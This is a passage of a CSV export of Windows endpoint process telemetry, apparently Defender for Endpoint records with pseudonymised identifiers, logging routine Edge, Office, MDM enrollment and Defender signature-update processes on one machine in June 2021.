Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1377,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:16:40.086883700+00:00,2648,msedge.exe,"""msedge.exe"" --type=crashpad-handler ""--user-data-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler ""--database=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data\Crashpad"" ""--metrics-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=91.0.4472.114 ""--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"" --annotation=plat=Win64 ""--annotation=prod=Microsoft Edge"" --annotation=ver=91.0.864.54 --initial-client-data=0xf0,0xf4,0xf8,0xcc,0xfc,0x7ffbde0806f8,0x7ffbde080708,0x7ffbde080718",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:16:40.056567800+00:00,18080,msedge.exe,"""msedge.exe"" --single-argument https://apc01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fkyc.blockpass.org%2Fkyc%2Fdashboard%2F%23%2Ffirst_digital_trust_c1c7e%2Fkyc_list&data=04%7C01%7C%7Cf18a8d27710b4146b58108d935e23cb4%7C943328ecec1048dc8344a281b9e5ac52%7C0%7C0%7C637600068082638440%7CUnknown%7CTWFpbGZsb3d8eyJ**********",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:16:40.120955700+00:00,2021-06-23 01:17:40.743488700+00:00,71cab0c9-c1e6-4c01-af5c-2bcef66e94da,computerpii_0a470890c60768167990033d701e7bd881398861,157502,False,10.7740.19041.1052,False,11540474045172280,,11540474045172281,2021-06-23 01:16:40.056567800+00:00,18080,2021-06-23 01:16:40.056567800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,18080,18560,TerminateProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,256.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1378,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:16:40.146348100+00:00,17952,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:16:40.236993600+00:00,2021-06-23 01:17:40.743540900+00:00,adb92c65-7f58-4e09-998c-ea3a5b05df7b,computerpii_0a470890c60768167990033d701e7bd881398861,157503,False,10.7740.19041.1052,False,11540474045171833,,11540474045172282,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1379,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:16:44.139860400+00:00,5028,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:16:44.608992500+00:00,2021-06-23 01:17:40.744106+00:00,5f4497df-9af8-4eca-b4ed-32a57a465448,computerpii_0a470890c60768167990033d701e7bd881398861,157513,False,10.7740.19041.1052,False,11540474045171833,,11540474045172284,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1380,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:16:47.806690300+00:00,14052,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:16:47.876226300+00:00,2021-06-23 01:17:40.744370800+00:00,0268536b-8c3f-4d55-bc3e-aef99235877f,computerpii_0a470890c60768167990033d701e7bd881398861,157518,False,10.7740.19041.1052,False,11540474045171833,,11540474045172285,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,msedge.exe,20024,256,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1381,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:17:04.387979400+00:00,8552,msedge.exe,"""msedge.exe"" --type=renderer --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:17:04.667776700+00:00,2021-06-23 01:17:40.745362300+00:00,9a3445a8-7b2c-4d8f-84d3-7229a947f85a,computerpii_0a470890c60768167990033d701e7bd881398861,157537,True,10.7740.19041.1052,False,11540474045171833,,11540474045172286,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,msedge.exe,20024,256,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+1382,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 04:39:18.913330600+00:00,19968,SDXHelper.exe,"""sdxhelper.exe""",PortableExecutable,2021-06-12 08:57:27.853849200+00:00,C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe,141160,a8252d1f5f159884fd66ccd77e36e0e6,eadbb47e3d669ea39db848ba066a0b3ba226cf41cc6c62b166dd74d29007d63d,06833da5eaf54d97e885088d0a8385bee2c1f017,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:39:18.941902400+00:00,2021-06-23 04:41:30.655672300+00:00,f9d9509f-2855-47be-90a9-7cffd3fdbaa8,computerpii_0a470890c60768167990033d701e7bd881398861,162782,False,10.7740.19041.1052,False,11540474045136925,,11540474045173493,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20738,SDXHELPER,SDXHELPER.EXE,Microsoft Office SDX Helper
+1383,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:40:41.009687900+00:00,2004,DeviceEnroller.exe,"deviceenroller.exe /o ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /c /q",PortableExecutable,2021-04-14 01:10:22.237455+00:00,C:\Windows\System32\DeviceEnroller.exe,480256,669107f0f0daf359086d6f4349412f7b,06f7b0c17988cae5a622bdcc27667f771a06243fdf0a88f34981947d5d6bf8f9,588d272614a5522df8539ec8f5ef477b6dcf33d9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:40:41.202260+00:00,2021-06-23 04:41:30.656558100+00:00,72512d14-42d9-4480-88a7-a0fa4049b78e,computerpii_0a470890c60768167990033d701e7bd881398861,162795,False,10.7740.19041.1052,False,11540474045136925,,11540474045173497,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,API for MDM Enrollment,deviceenroller.exe,API for MDM Enrollment
+1384,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:40:55.799949200+00:00,1096,MpCmdRun.exe,"""MpCmdRun.exe"" -SignatureUpdate",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,06291a6c019c8df6a2cdcd9bcf69e99f,e424757d661bb89804b7147fa5e4b60ec21816aed8dedba1b291c6d41bc190b4,092720f8052fbd0fd20d37fa3f16871493d13777,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:40:41.287204500+00:00,18808,omadmclient.exe,"omadmclient.exe /serverid ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /lookuptype 1 /initiator 0",True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:40:55.940405700+00:00,2021-06-23 04:41:30.657599400+00:00,1ecadc0d-883d-4b6c-bfcb-e9a2ef4e15f4,computerpii_0a470890c60768167990033d701e7bd881398861,162811,False,10.7740.19041.1052,False,11540474045173501,,11540474045173506,2021-06-23 04:40:41.287204500+00:00,18808,2021-06-23 04:40:41.287204500+00:00,\Device\HarddiskVolume3\Windows\System32\omadmclient.exe,18808,128,ActiveProcessStartkey,C:\Windows\System32,436736,2045-06-30 03:05:21+00:00,2021-06-09 01:20:50.429604200+00:00,2021-06-23 03:11:16.068415900+00:00,2021-06-09 01:20:50.418603800+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,omadmclient,omadmclient.exe,Host Process for OMA-DM Client,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1385,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:40:55.809429500+00:00,6936,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:40:55.799949200+00:00,1096,MpCmdRun.exe,"""MpCmdRun.exe"" -SignatureUpdate",True,2021-06-23 04:40:41.287204500+00:00,18808,\Device\HarddiskVolume3\Windows\System32\omadmclient.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:40:55.940754400+00:00,2021-06-23 04:41:30.657667200+00:00,c5cc3a93-2e0e-4439-8c00-d21ce9273739,computerpii_0a470890c60768167990033d701e7bd881398861,162812,False,10.7740.19041.1052,False,11540474045173506,,11540474045173507,2021-06-23 04:40:55.799949200+00:00,1096,2021-06-23 04:40:55.799949200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,1096,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,644888,2103-08-02 08:43:42+00:00,2021-06-14 00:56:50.051000+00:00,2021-06-23 00:55:21.627906600+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1386,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:40:55.866739600+00:00,984,MpCmdRun.exe,"""MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob -UnmanagedUpdate",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:40:55.956268800+00:00,2021-06-23 04:41:30.657732700+00:00,1671933c-d3f0-485a-bd30-a4c5516655aa,computerpii_0a470890c60768167990033d701e7bd881398861,162813,False,10.7740.19041.1052,False,11540474045145394,,11540474045173508,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,128,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+1387,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:40:55.875742+00:00,12372,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 04:40:55.866739600+00:00,984,MpCmdRun.exe,"""MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob -UnmanagedUpdate",True,2021-06-14 00:56:58.859290200+00:00,2848,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:40:55.966416900+00:00,2021-06-23 04:41:30.657797200+00:00,e58987e7-fd4f-4792-84ff-f5e35e979276,computerpii_0a470890c60768167990033d701e7bd881398861,162814,False,10.7740.19041.1052,False,11540474045173508,,11540474045173509,2021-06-23 04:40:55.866739600+00:00,984,2021-06-23 04:40:55.866739600+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows 